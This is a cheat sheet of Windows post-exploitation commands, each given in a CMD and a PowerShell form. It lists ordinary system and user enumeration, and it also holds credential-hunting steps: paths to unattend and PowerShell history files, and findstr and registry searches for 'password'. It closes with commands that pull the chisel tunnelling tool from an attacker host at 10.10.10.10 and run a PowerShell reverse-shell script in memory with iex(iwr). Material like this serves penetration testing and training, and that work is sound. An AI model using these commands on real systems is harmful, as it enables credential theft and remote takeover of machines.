Commands

  • To understand how PowerShell works and how its commands are formed, check out

Powershell
  • Commands used in post-exploitation, in CMD and PowerShell variants

C: command for cmd
P: command for powershell
  • System information

C: systeminfo
P: Get-ComputerInfo
  • Grep

C: findstr
P: Select-String -Pattern "OS:"
  • Piping

|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"
  • User name

C: whoami [or] echo %username%
P: $env:UserName
  • Machine name

C: hostname
P: $env:UserDomain [or] $env:ComputerName
  • Users

C: net user [or] net user /domain
P: Get-LocalUser
  • Information about the user

C: net user dnoscp
P: Get-LocalUser dnoscp
  • Groups

C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup
  • Get Group members

C: net localgroup Administrators
P: Get-LocalGroupMember Administrators
  • Get the network adapters

C: ipconfig [or] ipconfig /all
P: Get-NetAdapter
  • Routing Table information

C: route print
P: Get-NetRoute
  • Open ports

C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection
  • Scheduled Jobs

C: schtasks
P: Get-ScheduledTask
  • Running Process

C: tasklist /svc
P: Get-Process
  • Starting a service

C: net start Themes
P: Start-Service Themes
  • Installed Drivers

C: driverquery
P: Get-WindowsDriver -Online -All
  • Last update information (installed hotfixes)

C: wmic qfe get Caption, Description, InstalledOn, HotFixID
P: (New-Object -ComObject "Microsoft.Update.AutoUpdate").Results | fl
  • Juicy files location

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • Find files

C: dir /s /p *.txt *.xml
P: Get-ChildItem -Path . -Include *.txt,*.xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'
  • Search for a string in a file

C: findstr /si "password" *.txt *.xml
P: Get-ChildItem -Recurse . -Include *.txt,*.xml | Select-String "password"
  • Search registry for passwords

C: reg query HKLM /f "password" /t REG_SZ /s
C: reg query HKCU /f "password" /t REG_SZ /s
  • Running Services

C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}
  • Information about a specific service

C: sc query "Spooler"
P: Get-Service "Spooler"
  • Copy a file

C: copy source_location destination
P: Copy-Item source_location -Destination destination
  • Move a file

C: move source_location destination
P: Move-Item source_location -Destination destination
  • Download a file

C: certutil -urlcache -split -f http://10.10.10.10/chisel.exe chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/chisel.exe", "chisel.exe")
  • Execute PowerShell scripts directly in memory

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)
